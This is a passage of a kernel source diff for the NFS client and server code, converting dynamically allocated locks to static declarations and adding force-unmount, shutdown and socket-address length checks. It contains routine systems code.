&nfs_data_lck_grp); + lck_mtx_destroy(&np->n_openlock, &nfs_open_grp); if (np->n_fhsize > NFS_SMALLFH) { FREE(np->n_fhp, M_NFSBIGFH); } @@ -594,13 +581,13 @@ loop: /* node is now initialized */ /* check if anyone's waiting on this node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); np->n_hflag &= ~(NHINIT | NHLOCKED); if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); 
+ lck_mtx_unlock(&nfs_node_hash_mutex); *npp = np; @@ -835,28 +822,37 @@ restart: ubc_setsize(vp, 0); } - /* mark this node and the directory busy while we do the remove */ - busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx)); + if (!vfs_isforce(nmp->nm_mountp)) { + /* mark this node and the directory busy while we do the remove */ + busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx)); + } else { + /* we are in force unmount we can't trust nsp->nsr_dnp, mark this np busy only */ + busyerror = nfs_node_set_busy(np, vfs_context_thread(ctx)); + } /* lock the node while we remove the silly file */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); while (np->n_hflag & NHLOCKED) { np->n_hflag |= NHLOCKWANT; - msleep(np, nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL); + msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL); } np->n_hflag |= NHLOCKED; - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); - /* purge the name cache to deter others from finding it */ - bzero(&cn, sizeof(cn)); - cn.cn_nameptr = nsp->nsr_name; - cn.cn_namelen = nsp->nsr_namlen; - nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx); + if (!vfs_isforce(nmp->nm_mountp)) { + /* purge the name cache to deter others from finding it */ + bzero(&cn, sizeof(cn)); + cn.cn_nameptr = nsp->nsr_name; + cn.cn_namelen = nsp->nsr_namlen; + nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx); + } FSDBG(264, np, np->n_size, np->n_vattr.nva_size, 0xf00d00f1); - /* now remove the silly file */ - nfs_removeit(nsp); + if (!vfs_isforce(nmp->nm_mountp)) { + /* now remove the silly file */ + nfs_removeit(nsp); + } /* clear all flags other than these */ nfs_node_lock_force(np); @@ -864,7 +860,11 @@ restart: nfs_node_unlock(np); if (!busyerror) { - nfs_node_clear_busy2(nsp->nsr_dnp, np); + if (!vfs_isforce(nmp->nm_mountp)) { + nfs_node_clear_busy2(nsp->nsr_dnp, np); + } else { + nfs_node_clear_busy(np); + } } if (unhash && 
vnode_isinuse(vp, 0)) { @@ -873,7 +873,7 @@ restart: ubc_setsize(vp, np->n_size); } - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (unhash) { /* * remove nfsnode from hash now so we can't accidentally find it @@ -893,13 +893,16 @@ restart: np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* cleanup sillyrename info */ if (nsp->nsr_cred != NOCRED) { kauth_cred_unref(&nsp->nsr_cred); } - vnode_rele(NFSTOV(nsp->nsr_dnp)); + if (!vfs_isforce(nmp->nm_mountp)) { + /* in case of forceful unmount usecounts ignore anyways */ + vnode_rele(NFSTOV(nsp->nsr_dnp)); + } FREE(nsp, M_TEMP); FSDBG_BOT(264, vp, np, np->n_flag, 0); out_free: @@ -1056,14 +1059,14 @@ nfs_vnop_reclaim( lck_mtx_unlock(&nmp->nm_lock); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (!force && (!LIST_EMPTY(&np->n_dirtyblkhd) || !LIST_EMPTY(&np->n_cleanblkhd))) { NP(np, "nfs_reclaim: dropping %s buffers", (!LIST_EMPTY(&np->n_dirtyblkhd) ? 
"dirty" : "clean")); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_vinvalbuf(vp, V_IGNORE_WRITEERR, ap->a_context, 0); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if ((vnode_vtype(vp) != VDIR) && np->n_sillyrename) { if (!force) { @@ -1083,7 +1086,7 @@ nfs_vnop_reclaim( np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* * Free up any directory cookie structures and large file handle @@ -1110,9 +1113,9 @@ nfs_vnop_reclaim( np->n_parent = NULL; } - lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp); - lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp); - lck_mtx_destroy(&np->n_openlock, nfs_open_grp); + lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp); + lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp); + lck_mtx_destroy(&np->n_openlock, &nfs_open_grp); FSDBG_BOT(265, vp, np, np->n_flag, 0xd1ed1e); NFS_ZFREE(nfsnode_zone, np); @@ -1434,7 +1437,7 @@ nfs_mount_is_dirty(mount_t mp) u_long ncnt = 0; microuptime(&now); #endif - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); for (i = 0; i <= nfsnodehash; i++) { LIST_FOREACH(np, &nfsnodehashtbl[i], n_hash) { #ifdef DODEBUG @@ -1446,7 +1449,7 @@ nfs_mount_is_dirty(mount_t mp) } } out: - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); #ifdef DODEBUG microuptime(&then); timersub(&then, &now, &diff); diff --git a/bsd/nfs/nfs_serv.c b/bsd/nfs/nfs_serv.c index 31db576a6..0346a7502 100644 --- a/bsd/nfs/nfs_serv.c +++ b/bsd/nfs/nfs_serv.c @@ -116,12 +116,12 @@ int nfsd_thread_count = 0; int nfsd_thread_max = 0; -lck_grp_t *nfsd_lck_grp; -lck_mtx_t *nfsd_mutex; +static LCK_GRP_DECLARE(nfsd_lck_grp, "nfsd"); +LCK_MTX_DECLARE(nfsd_mutex, &nfsd_lck_grp); struct nfsd_head nfsd_head, nfsd_queue; -lck_grp_t *nfsrv_slp_rwlock_group; -lck_grp_t *nfsrv_slp_mutex_group; +LCK_GRP_DECLARE(nfsrv_slp_rwlock_group, "nfsrv-slp-rwlock"); 
+LCK_GRP_DECLARE(nfsrv_slp_mutex_group, "nfsrv-slp-mutex"); struct nfsrv_sockhead nfsrv_socklist, nfsrv_sockwg, nfsrv_sockwait, nfsrv_sockwork; struct nfsrv_sock *nfsrv_udpsock = NULL; @@ -132,15 +132,15 @@ struct nfsrv_expfs_list nfsrv_exports; struct nfsrv_export_hashhead *nfsrv_export_hashtbl = NULL; int nfsrv_export_hash_size = NFSRVEXPHASHSZ; u_long nfsrv_export_hash; -lck_grp_t *nfsrv_export_rwlock_group; -lck_rw_t nfsrv_export_rwlock; +static LCK_GRP_DECLARE(nfsrv_export_rwlock_group, "nfsrv-export-rwlock"); +LCK_RW_DECLARE(nfsrv_export_rwlock, &nfsrv_export_rwlock_group); #if CONFIG_FSE /* NFS server file modification event generator */ struct nfsrv_fmod_hashhead *nfsrv_fmod_hashtbl; u_long nfsrv_fmod_hash; -lck_grp_t *nfsrv_fmod_grp; -lck_mtx_t *nfsrv_fmod_mutex; +static LCK_GRP_DECLARE(nfsrv_fmod_grp, "nfsrv_fmod"); +LCK_MTX_DECLARE(nfsrv_fmod_mutex, &nfsrv_fmod_grp); static int nfsrv_fmod_timer_on = 0; int nfsrv_fsevents_enabled = 1; #endif @@ -158,7 +158,7 @@ uint32_t nfsrv_user_stat_enabled = 1; uint32_t nfsrv_user_stat_node_count = 0; uint32_t nfsrv_user_stat_max_idle_sec = NFSRV_USER_STAT_DEF_IDLE_SEC; uint32_t nfsrv_user_stat_max_nodes = NFSRV_USER_STAT_DEF_MAX_NODES; -lck_grp_t *nfsrv_active_user_mutex_group; +LCK_GRP_DECLARE(nfsrv_active_user_mutex_group, "nfs-active-user-mutex"); int nfsrv_wg_delay = NFSRV_WGATHERDELAY * 1000; int nfsrv_wg_delay_v3 = 0; @@ -203,31 +203,12 @@ nfsrv_init(void) printf("struct nfsrv_sock bloated (> %dbytes)\n", NFS_SVCALLOC); } - /* init nfsd mutex */ - nfsd_lck_grp = lck_grp_alloc_init("nfsd", LCK_GRP_ATTR_NULL); - nfsd_mutex = lck_mtx_alloc_init(nfsd_lck_grp, LCK_ATTR_NULL); - - /* init slp rwlock */ - nfsrv_slp_rwlock_group = lck_grp_alloc_init("nfsrv-slp-rwlock", LCK_GRP_ATTR_NULL); - nfsrv_slp_mutex_group = lck_grp_alloc_init("nfsrv-slp-mutex", LCK_GRP_ATTR_NULL); - /* init export data structures */ LIST_INIT(&nfsrv_exports); - nfsrv_export_rwlock_group = lck_grp_alloc_init("nfsrv-export-rwlock", 
LCK_GRP_ATTR_NULL); - lck_rw_init(&nfsrv_export_rwlock, nfsrv_export_rwlock_group, LCK_ATTR_NULL); - - /* init active user list mutex structures */ - nfsrv_active_user_mutex_group = lck_grp_alloc_init("nfs-active-user-mutex", LCK_GRP_ATTR_NULL); - - /* init nfs server request cache mutex */ - nfsrv_reqcache_lck_grp = lck_grp_alloc_init("nfsrv_reqcache", LCK_GRP_ATTR_NULL); - nfsrv_reqcache_mutex = lck_mtx_alloc_init(nfsrv_reqcache_lck_grp, LCK_ATTR_NULL); #if CONFIG_FSE /* init NFS server file modified event generation */ nfsrv_fmod_hashtbl = hashinit(NFSRVFMODHASHSZ, M_TEMP, &nfsrv_fmod_hash); - nfsrv_fmod_grp = lck_grp_alloc_init("nfsrv_fmod", LCK_GRP_ATTR_NULL); - nfsrv_fmod_mutex = lck_mtx_alloc_init(nfsrv_fmod_grp, LCK_ATTR_NULL); #endif /* initialize NFS server timer callouts */ @@ -1146,7 +1127,7 @@ nfsrv_fmod_timer(__unused void *param0, __unused void *param1) int i, fmod_fire; LIST_INIT(&firehead); - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); again: clock_get_uptime(&timenow); clock_interval_to_deadline(nfsrv_fmod_pendtime, 1000 * 1000, @@ -1194,7 +1175,7 @@ again: } if (fmod_fire) { - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); /* * Fire off the content modified fsevent for each * entry and free it. 
@@ -1211,7 +1192,7 @@ again: LIST_REMOVE(fp, fm_link); FREE(fp, M_TEMP); } - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); nfsrv_fmod_pending -= fmod_fire; goto again; } @@ -1234,7 +1215,7 @@ again: nfs_interval_timer_start(nfsrv_fmod_timer_call, interval); } - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); } /* @@ -1250,7 +1231,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx) struct nfsrv_fmod *fp; struct nfsrv_fmod_hashhead *head; - lck_mtx_lock(nfsrv_fmod_mutex); + lck_mtx_lock(&nfsrv_fmod_mutex); /* * Compute the time in the future when the @@ -1271,7 +1252,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx) LIST_REMOVE(fp, fm_link); LIST_INSERT_HEAD(head, fp, fm_link); } - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); return; } } @@ -1306,7 +1287,7 @@ nfsrv_modified(vnode_t vp, vfs_context_t ctx) nfsrv_fmod_pendtime); } done: - lck_mtx_unlock(nfsrv_fmod_mutex); + lck_mtx_unlock(&nfsrv_fmod_mutex); return; } #endif /* CONFIG_FSE */ @@ -1856,7 +1837,7 @@ loop1: * * Add/Remove the socket in the nfsrv_sockwg queue as needed. 
*/ - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); if (slp->ns_wgtime) { if (slp->ns_wgq.tqe_next == SLPNOLIST) { TAILQ_INSERT_HEAD(&nfsrv_sockwg, slp, ns_wgq); @@ -1870,7 +1851,7 @@ loop1: TAILQ_REMOVE(&nfsrv_sockwg, slp, ns_wgq); slp->ns_wgq.tqe_next = SLPNOLIST; } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return 0; } @@ -1950,7 +1931,7 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1) cur_usec = now.tv_sec * 1000000 + now.tv_usec; next_usec = cur_usec + (NFSRV_WGATHERDELAY * 1000); - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); TAILQ_FOREACH(slp, &nfsrv_sockwg, ns_wgq) { if (slp->ns_wgtime) { writes_pending++; @@ -1969,10 +1950,10 @@ nfsrv_wg_timer(__unused void *param0, __unused void *param1) if (writes_pending == 0) { nfsrv_wg_timer_on = 0; - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); return; } - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); /* * Return the number of msec to wait again diff --git a/bsd/nfs/nfs_socket.c b/bsd/nfs/nfs_socket.c index eaca59ada..435bbb782 100644 --- a/bsd/nfs/nfs_socket.c +++ b/bsd/nfs/nfs_socket.c @@ -90,6 +90,7 @@ #include #include +#include #include #include #include @@ -114,6 +115,11 @@ #define NFS_SOCK_DBG(...) 
NFS_DBG(NFS_FAC_SOCK, 7, ## __VA_ARGS__) #define NFS_SOCK_DUMP_MBUF(msg, mb) if (NFS_IS_DBG(NFS_FAC_SOCK, 15)) nfs_dump_mbuf(__func__, __LINE__, (msg), (mb)) +#ifndef SUN_LEN +#define SUN_LEN(su) \ + (sizeof(*(su)) - sizeof((su)->sun_path) + strnlen((su)->sun_path, sizeof((su)->sun_path))) +#endif /* SUN_LEN */ + /* XXX */ boolean_t current_thread_aborted(void); kern_return_t thread_terminate(thread_t); @@ -552,17 +558,27 @@ nfs_socket_create( switch (sa->sa_family) { case AF_INET: + if (sa->sa_len != sizeof(struct sockaddr_in)) { + return EINVAL; + } + sinaddr = &((struct sockaddr_in*)sa)->sin_addr; + if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) { + strlcpy(naddr, "", sizeof(naddr)); + } + break; case AF_INET6: - if (sa->sa_family == AF_INET) { - sinaddr = &((struct sockaddr_in*)sa)->sin_addr; - } else { - sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr; + if (sa->sa_len != sizeof(struct sockaddr_in6)) { + return EINVAL; } + sinaddr = &((struct sockaddr_in6*)sa)->sin6_addr; if (inet_ntop(sa->sa_family, sinaddr, naddr, sizeof(naddr)) != naddr) { strlcpy(naddr, "", sizeof(naddr)); } break; case AF_LOCAL: + if (sa->sa_len != sizeof(struct sockaddr_un) && sa->sa_len != SUN_LEN((struct sockaddr_un *)sa)) { + return EINVAL; + } strlcpy(naddr, ((struct sockaddr_un *)sa)->sun_path, sizeof(naddr)); break; default: @@ -586,7 +602,7 @@ nfs_socket_create( } return ENOMEM; } - lck_mtx_init(&nso->nso_lock, nfs_request_grp, LCK_ATTR_NULL); + lck_mtx_init(&nso->nso_lock, &nfs_request_grp, LCK_ATTR_NULL); nso->nso_sotype = sotype; if (nso->nso_sotype == SOCK_STREAM) { nfs_rpc_record_state_init(&nso->nso_rrs); @@ -673,7 +689,7 @@ nfs_socket_destroy(struct nfs_socket *nso) if (nso->nso_sotype == SOCK_STREAM) { nfs_rpc_record_state_cleanup(&nso->nso_rrs); } - lck_mtx_destroy(&nso->nso_lock, nfs_request_grp); + lck_mtx_destroy(&nso->nso_lock, &nfs_request_grp); if (nso->nso_saddr) { FREE(nso->nso_saddr, M_SONAME); } @@ -1988,7 +2004,7 @@ nfs_reconnect(struct 
nfsmount *nmp) * as needing a resend. (Though nfs_need_reconnect() probably * marked them all already.) */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(rq, &nfs_reqq, r_chain) { if (rq->r_nmp == nmp) { lck_mtx_lock(&rq->r_mtx); @@ -2003,7 +2019,7 @@ nfs_reconnect(struct nfsmount *nmp) lck_mtx_unlock(&rq->r_mtx); } } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return 0; } @@ -2061,7 +2077,7 @@ nfs_need_reconnect(struct nfsmount *nmp) * Loop through outstanding request list and * mark all requests as needing a resend. */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(rq, &nfs_reqq, r_chain) { if (rq->r_nmp == nmp) { lck_mtx_lock(&rq->r_mtx); @@ -2076,7 +2092,7 @@ nfs_need_reconnect(struct nfsmount *nmp) lck_mtx_unlock(&rq->r_mtx); } } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); } @@ -2445,7 +2461,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp) int error, on = 1; in_port_t port; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (nfs4_cb_id == 0) { TAILQ_INIT(&nfs4_cb_mounts); TAILQ_INIT(&nfs4_cb_socks); @@ -2459,7 +2475,7 @@ nfs4_mount_callback_setup(struct nfsmount *nmp) TAILQ_INSERT_HEAD(&nfs4_cb_mounts, nmp, nm_cblink); if (nfs4_cb_so) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } @@ -2575,7 +2591,7 @@ ipv6_bind_again: fail: if (error) { nfs4_cb_so = nfs4_cb_so6 = NULL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); if (so) { sock_shutdown(so, SHUT_RDWR); sock_close(so); @@ -2585,7 +2601,7 @@ fail: sock_close(so6); } } else { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } } @@ -2604,19 +2620,19 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp) struct nfs4_cb_sock_list cb_socks; struct timespec ts = { .tv_sec = 1, .tv_nsec = 0 }; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if 
(nmp->nm_cbid == 0) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } TAILQ_REMOVE(&nfs4_cb_mounts, nmp, nm_cblink); /* wait for any callbacks in progress to complete */ while (nmp->nm_cbrefs) { - msleep(&nmp->nm_cbrefs, nfs_global_mutex, PSOCK, "cbshutwait", &ts); + msleep(&nmp->nm_cbrefs, &nfs_global_mutex, PSOCK, "cbshutwait", &ts); } nmp->nm_cbid = 0; if (--nfs4_cb_so_usecount) { - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } so = nfs4_cb_so; @@ -2624,7 +2640,7 @@ nfs4_mount_callback_shutdown(struct nfsmount *nmp) nfs4_cb_so = nfs4_cb_so6 = NULL; TAILQ_INIT(&cb_socks); TAILQ_CONCAT(&cb_socks, &nfs4_cb_socks, ncbs_link); - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); if (so) { sock_shutdown(so, SHUT_RDWR); sock_close(so); @@ -2654,10 +2670,10 @@ nfs4_callback_timer(__unused void *param0, __unused void *param1) struct timeval now; loop: - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); if (TAILQ_EMPTY(&nfs4_cb_socks)) { nfs4_callback_timer_on = 0; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); return; } microuptime(&now); @@ -2667,7 +2683,7 @@ loop: continue; } TAILQ_REMOVE(&nfs4_cb_socks, ncbsp, ncbs_link); - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); sock_shutdown(ncbsp->ncbs_so, SHUT_RDWR); sock_close(ncbsp->ncbs_so); nfs_rpc_record_state_cleanup(&ncbsp->ncbs_rrs); @@ -2677,7 +2693,7 @@ loop: nfs4_callback_timer_on = 1; nfs_interval_timer_start(nfs4_callback_timer_call, NFS4_CB_TIMER_PERIOD * 1000); - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } /* @@ -2741,7 +2757,7 @@ nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag) microuptime(&now); ncbsp->ncbs_stamp = now.tv_sec; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); /* add it to the list */ TAILQ_INSERT_HEAD(&nfs4_cb_socks, ncbsp, ncbs_link); @@ -2772,7 +2788,7 @@ 
nfs4_cb_accept(socket_t so, __unused void *arg, __unused int waitflag) nfs_interval_timer_start(nfs4_callback_timer_call, 500); } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); } /* @@ -2788,14 +2804,14 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag) mbuf_t m; int error = 0, recv = 1; - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); while (ncbsp->ncbs_flags & NCBSOCK_UPCALL) { /* wait if upcall is already in progress */ ncbsp->ncbs_flags |= NCBSOCK_UPCALLWANT; - msleep(ncbsp, nfs_global_mutex, PSOCK, "cbupcall", &ts); + msleep(ncbsp, &nfs_global_mutex, PSOCK, "cbupcall", &ts); } ncbsp->ncbs_flags |= NCBSOCK_UPCALL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); /* loop while we make error-free progress */ while (!error && recv) { @@ -2819,9 +2835,9 @@ nfs4_cb_rcv(socket_t so, void *arg, __unused int waitflag) ncbsp->ncbs_stamp = now.tv_sec; } - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); ncbsp->ncbs_flags &= ~NCBSOCK_UPCALL; - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); wakeup(ncbsp); } @@ -2924,7 +2940,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq) goto nfsmout; } /* match the callback ID to a registered mount */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); TAILQ_FOREACH(nmp, &nfs4_cb_mounts, nm_cblink) { if (nmp->nm_cbid != cbid) { continue; @@ -2941,7 +2957,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq) if (nmp) { nmp->nm_cbrefs++; } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); if (!nmp) { /* if no mount match, just drop socket. 
*/ error = EPERM; @@ -3087,12 +3103,12 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq) nfsm_chain_null(&nmrep); /* drop the callback reference on the mount */ - lck_mtx_lock(nfs_global_mutex); + lck_mtx_lock(&nfs_global_mutex); nmp->nm_cbrefs--; if (!nmp->nm_cbid) { wakeup(&nmp->nm_cbrefs); } - lck_mtx_unlock(nfs_global_mutex); + lck_mtx_unlock(&nfs_global_mutex); break; } @@ -3857,7 +3873,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep) * Loop through the request list to match up the reply * Iff no match, just drop it. */ - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); TAILQ_FOREACH(req, &nfs_reqq, r_chain) { if (req->r_nmrep.nmc_mhead || (rxid != R_XID32(req->r_xid))) { continue; @@ -3933,7 +3949,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep) } #endif /* CONFIG_NFS_GSS */ lck_mtx_unlock(&req->r_mtx); - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* if it's an async RPC with a callback, queue it up */ if (asyncioq) { nfs_asyncio_finish(req); @@ -3943,7 +3959,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep) if (!req) { /* not matched to a request, so drop it. */ - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); OSAddAtomic64(1, &nfsstats.rpcunexpected); mbuf_freem(mrep); } @@ -4089,7 +4105,7 @@ nfs_request_create( panic("nfs_request: invalid NFSv4 RPC request %d\n", procnum); } - lck_mtx_init(&req->r_mtx, nfs_request_grp, LCK_ATTR_NULL); + lck_mtx_init(&req->r_mtx, &nfs_request_grp, LCK_ATTR_NULL); req->r_nmp = nmp; nmp->nm_ref++; req->r_np = np; @@ -4161,12 +4177,12 @@ nfs_request_destroy(struct nfsreq *req) * Still on an async I/O queue? * %%% But which one, we may be on a local iod. 
*/ - lck_mtx_lock(nfsiod_mutex); + lck_mtx_lock(&nfsiod_mutex); if (nmp && req->r_achain.tqe_next != NFSREQNOLIST) { TAILQ_REMOVE(&nmp->nm_iodq, req, r_achain); req->r_achain.tqe_next = NFSREQNOLIST; } - lck_mtx_unlock(nfsiod_mutex); + lck_mtx_unlock(&nfsiod_mutex); } lck_mtx_lock(&req->r_mtx); @@ -4233,7 +4249,7 @@ nfs_request_destroy(struct nfsreq *req) if (nmp) { nfs_mount_rele(nmp); } - lck_mtx_destroy(&req->r_mtx, nfs_request_grp); + lck_mtx_destroy(&req->r_mtx, &nfs_request_grp); if (req->r_flags & R_ALLOCATED) { NFS_ZFREE(nfs_req_zone, req); } @@ -4330,11 +4346,11 @@ nfs_request_send(struct nfsreq *req, int wait) req->r_flags |= R_SENDING; lck_mtx_unlock(&req->r_mtx); - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); nmp = req->r_nmp; if (nfs_mount_gone(nmp)) { - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return ENXIO; } @@ -4372,7 +4388,7 @@ nfs_request_send(struct nfsreq *req, int wait) nfs_interval_timer_start(nfs_request_timer_call, NFS_REQUESTDELAY); } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* Send the request... 
*/ return nfs_send(req, wait); @@ -5191,16 +5207,16 @@ nfs_softterm(struct nfsreq *req) void nfs_reqdequeue(struct nfsreq *req) { - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); while (req->r_lflags & RL_BUSY) { req->r_lflags |= RL_WAITING; - msleep(&req->r_lflags, nfs_request_mutex, PSOCK, "reqdeq", NULL); + msleep(&req->r_lflags, &nfs_request_mutex, PSOCK, "reqdeq", NULL); } if (req->r_lflags & RL_QUEUED) { TAILQ_REMOVE(&nfs_reqq, req, r_chain); req->r_lflags &= ~RL_QUEUED; } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); } /* @@ -5265,11 +5281,11 @@ nfs_request_timer(__unused void *param0, __unused void *param1) TAILQ_INIT(&nfs_mount_poke_queue); restart: - lck_mtx_lock(nfs_request_mutex); + lck_mtx_lock(&nfs_request_mutex); req = TAILQ_FIRST(&nfs_reqq); if (req == NULL) { /* no requests - turn timer off */ nfs_request_timer_on = 0; - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); return; } @@ -5399,7 +5415,7 @@ restart: TAILQ_REMOVE(&nfs_mount_poke_queue, nmp, nm_pokeq); } /* Release our lock state, so we can become a zombie */ - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* * Note nfs_mount_make zombie(nmp) must be @@ -5407,7 +5423,7 @@ restart: * work we release nm_lock in * nfs_make_mount_zombie with out acquiring any * other locks. (Later, in nfs_mount_zombie we - * will acquire nfs_request_mutex, r_mtx, + * will acquire &nfs_request_mutex, r_mtx, * nm_lock in that order). So we should not be * introducing deadlock here. We take a reference * on the mount so that its still there when we @@ -5508,7 +5524,7 @@ restart: lck_mtx_unlock(&req->r_mtx); } - lck_mtx_unlock(nfs_request_mutex); + lck_mtx_unlock(&nfs_request_mutex); /* poke any sockets */ while ((nmp = TAILQ_FIRST(&nfs_mount_poke_queue))) { @@ -5535,6 +5551,7 @@ nfs_noremotehang(thread_t thd) * This is used to determine if we need to bail on a mount. 
* ETIMEDOUT is returned if there has been a soft timeout. * EINTR is returned if there is a signal pending that is not being ignored + * ESHUTDOWN is returned if the system is in shutdown. * and the mount is interruptable, or if we are a thread that is in the process * of cancellation (also SIGKILL posted). */ @@ -5549,6 +5566,11 @@ nfs_sigintr(struct nfsmount *nmp, struct nfsreq *req, thread_t thd, int nmplocke return ENXIO; } + if (get_system_inshutdown()) { + NFS_SOCK_DBG("Shutdown in progress\n"); + return ESHUTDOWN; + } + if (req && (req->r_flags & R_SOFTTERM)) { return ETIMEDOUT; /* request has been terminated. */ } @@ -6685,9 +6707,9 @@ dorecs: int wake = (slp->ns_flag & SLP_WORKTODO); lck_rw_done(&slp->ns_rwlock); if (wake && nfsd_thread_count) { - lck_mtx_lock(nfsd_mutex); + lck_mtx_lock(&nfsd_mutex); nfsrv_wakenfsd(slp); - lck_mtx_unlock(nfsd_mutex); + lck_mtx_unlock(&nfsd_mutex); } } } diff --git a/bsd/nfs/nfs_srvcache.c b/bsd/nfs/nfs_srvcache.c index 5addbf6fb..a934d4d07 100644 --- a/bsd/nfs/nfs_srvcache.c +++ b/bsd/nfs/nfs_srvcache.c @@ -100,8 +100,8 @@ LIST_HEAD(nfsrv_reqcache_hash, nfsrvcache) * nfsrv_reqcache_hashtbl; 